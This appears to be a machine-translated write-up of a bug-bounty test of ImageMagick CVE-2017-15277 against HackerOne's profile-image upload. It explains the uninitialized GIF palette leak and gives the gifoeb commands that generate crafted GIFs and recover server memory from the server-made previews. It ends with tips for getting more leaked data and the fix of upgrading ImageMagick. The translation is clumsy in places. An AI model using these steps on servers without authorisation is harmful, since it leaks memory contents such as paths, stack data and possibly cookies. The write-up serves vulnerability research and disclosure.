Shulou(Shulou.com)05/31 Report--

HackerOne platform ImageMagick vulnerabilities lead to server memory information leakage example analysis, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Hello, everyone. Today I would like to share about the ImageMagick vulnerability (CVE-2017-15277) of GIF image processing on the HackerOne platform. The vulnerability is very simple.

Introduction to CVE-2017-15277

CVE-2017-15277 was first discovered by security researcher Emil Lerner in October 2017. it belongs to an open source image processing component ImageMagick vulnerability, and the affected software are ImageMagick 7.0.6-1 and Graphicsmagick 1.3.26. The reason is that when ImageMagick processes GIF images without global or local palettes, there are uninitialized palettes in ImageMagick 7.0.6-1 and Graphicsmagick 1.3.26, and there is a security vulnerability in ReadGIFImage in their coders/gif.c files. If attackers use ReadGIFImage to process GIF images and construct operations, they can indirectly obtain memory data information in the server through uninitialized palettes.

To put it simply, if ImageMagick 7.0.6-1 and Graphicsmagick 1.3.26 are deployed in the server, and there is an uninitialized palette mechanism, then, using CVE-2017-15277, by constructing a picture file, upload to any place on the server that can be uploaded, and then, by processing this constructed image, the server will take advantage of the uninitialized palette mechanism Convert it into image preview files with different pixels, and these image preview files may contain some information related to server memory, such as Stack trace (stack trace) and String value (string value) information.

In addition, in terms of practical functions, ImageMagick is an open source software for displaying, converting and editing raster and vector image files, it is used for cropping, resizing and changing color functions in many web applications, and supports a variety of image formats.

Vulnerability exploitation

Let's go straight to the vulnerability exploitation section, where we target the HackerOne website for vulnerability testing.

First, I downloaded the exploit package https://github.com/neex/gifoeb published by Emil Lerner on Github

After that, create a GIF exploit (exploitable) picture of 512x512 pixels with the following command:

. / gifoeb gen 512x512 dump.gif

Of course, you can also change the generated image file to other suffix formats, such as .jpg, .tiff, .bmp, etc., or you can create exploiting images that generate other different pixels:

Next, log in to my HackerOne account and try to upload the loophole generated by the above command in the profile of the user to exploit the GIF image:

After that, after the server backend handles this vulnerability and exploits GIF images, it will generate a preview image of the corresponding 512x512 pixels.

Then, in GIF format, I tried to generate exploiting images of different pixels and upload them one by one to get a preview of the different pixels generated by the server's backend:

Save the preview images of these different pixels in a folder:

Finally, recover the server memory information contained in these preview images with the following command:

For p in previews/*; do. / gifoeb recover $p | strings; done

You can see that the preview images of these different pixels reveal the running information in the server memory, including the server path (path), operating system (OS), software version, and so on.

Vulnerability impact

The ImageMagick vulnerability (CVE-2017-15277) may lead to the disclosure of server-related information such as mail, Cookie, SQL query statements, and file directories. In the above vulnerability tests, we found only HackerOne's operating system, file directories, and some stack trace disclosure information. Bug fixes are, of course, upgrading ImageMagick components to the latest version.

Vulnerability exploitation recommendation

1. In the latest ImageMagick component, this vulnerability has been mitigated and fixed. If you upload an exploited image to the server, you will only get a black preview image, which will not disclose any server memory information.

2. Even if you can get the preview image generated by the server in some exploit scenarios, you should see if there is any leakage of server-related information related to the file directory, operating system version and so on. If it is only some stack trace information like {{* a _ A _ a _ a ^ a; bb (b |}), you still need to continue testing. Don't rush to report the vulnerability.

3. Construct vulnerabilities with different resolutions and extensions to exploit images, especially those with gray pixels, which contain much more information than blue, green or red images. The final availability and effect depends on different websites and ImageMagick component versions.

After reading the above, have you mastered the method of analyzing the examples of server memory information leakage caused by ImageMagick vulnerabilities on the HackerOne platform? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.